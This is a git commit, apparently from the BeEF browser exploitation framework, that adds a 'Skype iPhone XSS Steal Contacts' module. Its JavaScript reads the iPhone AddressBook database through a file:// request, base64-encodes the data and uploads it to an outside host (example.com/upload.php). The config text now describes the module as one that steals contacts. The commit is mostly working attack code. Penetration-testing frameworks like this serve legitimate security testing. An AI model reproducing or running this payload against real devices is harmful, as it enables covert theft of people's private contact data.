Adding the JS code of the Skype XSS exploit

This commit is contained in:
Saafan
2012-03-10 20:46:04 +02:00
parent 8c74fdd680
commit a5e7823588
3 changed files with 29 additions and 6 deletions

View File

@@ -15,7 +15,32 @@
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
x = new XMLHttpRequest;
x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");
x.overrideMimeType("text/plain; charset=x-user-defined");
x.send();
x.onreadystatechange = function() {
if(x.readyState == 4){
a = x.responseText || "";
ff=[];
mx=a.length;
scc = String.fromCharCode;
}
for(var z = 0 ; z < mx ; z++){
ff[z] = scc(a.charCodeAt(z)&255);
}
b=ff.join("");
b=btoa(b);
xp = new XMLHttpRequest;
xp.open("post","http://example.com/upload.php",!0);
xp.setRequestHeader("Content-Type","multipart/form-data;boundary=xxx,");
a = "--xxx\r\nContent-Disposition:form-data;name=\"media\";filename=\"ios.sqlitedb\"\r\nContent-Type:application/octet-stream\r\n\r\n"+b+"\r\n--xxx--";
xp.send(a);
};
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'SQL file sent');
});

View File

@@ -18,8 +18,8 @@ beef:
skype_xss:
enable: true
category: "Exploits"
name: "Skykpe iPhone XSS"
description: "This module will retrieve the session cookie from the current page."
name: "Skykpe iPhone XSS Steal Contacts"
description: "This module will steal iPhone contacts using a Skype XSS vuln."
authors: ["saafan"]
target:
working: ["ALL"]

View File

@@ -20,9 +20,7 @@ class Get_cookie < BeEF::Core::Command
##Stub##
content = {}
content['cookie'] = @datastore['cookie']
save content
save({'result' => @datastore['result']})
end
end